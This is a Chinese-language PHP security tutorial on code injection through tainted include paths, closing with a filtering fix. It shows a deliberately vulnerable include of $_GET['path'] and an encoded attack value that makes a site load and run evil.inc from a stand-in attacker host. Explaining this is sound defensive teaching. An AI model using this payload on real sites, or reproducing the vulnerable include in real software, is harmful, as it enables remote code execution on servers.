PHP安全-代碼注入
一個(gè)特別危險(xiǎn)的情形是當(dāng)你試圖使用被污染數(shù)據(jù)作為動(dòng)態(tài)包含的前導(dǎo)部分時(shí):
<?php
include '{$_GET[’path’]}/header.inc';
?>
在這種情形下攻擊者能操縱不只是文件名,還能控制所包含的資源。由于PHP默認(rèn)不只可以包含文件,還可以包含下面的資源(由配置文件中的allow_url_fopen所控制):
<?php
include ’http://www.google.com/’;
?>
include語(yǔ)句在此時(shí)會(huì)把http://www.google.com的網(wǎng)頁(yè)源代碼作為本地文件一樣包含進(jìn)來。雖然上面的例子是無害的,但是想像一下如果GOOGLE返回的源代碼包含PHP代碼時(shí)會(huì)如何。這樣其中包含的PHP代碼就會(huì)被解析并執(zhí)行。這是攻擊者借以發(fā)布惡意代碼摧毀你的安全體系的良機(jī)。
想象一下path的值指向了下面的攻擊者所控制的資源:
http://example.org/index.php?pat ... e.org%2Fevil.inc%3F
在上例中,path的值是URL編碼過的,原值如下:
http://evil.example.org/evil.inc?
這就導(dǎo)致了include語(yǔ)句包含并執(zhí)行了攻擊者所選定的腳本(evil.inc),同時(shí)原來的文件名/header.inc會(huì)被認(rèn)為是一個(gè)請(qǐng)求串:
<?php
include 'http://evil.example.org/evil.inc?/header.inc';
?>
這樣攻擊者就避免了去猜測(cè)剩下的目錄和文件名(/header.onc)并在evil.example.org上建立相同的路徑和文件名的必要性。相反地,在受攻擊網(wǎng)站的具體文件名被屏蔽的情況下,他只要保證evil.inc中輸出合法的他想要執(zhí)行的代碼就行了。
這種情況與允許攻擊者在你的網(wǎng)站上直接修改PHP代碼一樣危險(xiǎn)。幸運(yùn)的是,只要在include和require語(yǔ)句前對(duì)數(shù)據(jù)進(jìn)行過濾即可防止這種情況的發(fā)生:
<?php
$clean = array();
/* $_GET[’path’] is filtered and stored in $clean[’path’]. */
include '{$clean[’path’]}/header.inc';
?>
相關(guān)文章:
1. CSS3實(shí)例分享之多重背景的實(shí)現(xiàn)(Multiple backgrounds)2. XML實(shí)體注入深入理解3. 不要在HTML中濫用div4. XML入門的常見問題(三)5. CSS Hack大全-教你如何區(qū)分出IE6-IE10、FireFox、Chrome、Opera6. XML入門的常見問題(四)7. XML 非法字符(轉(zhuǎn)義字符)8. Xpath語(yǔ)法格式總結(jié)9. 前端html+css實(shí)現(xiàn)動(dòng)態(tài)生日快樂代碼10. JavaScript多級(jí)判定代碼優(yōu)化淺析
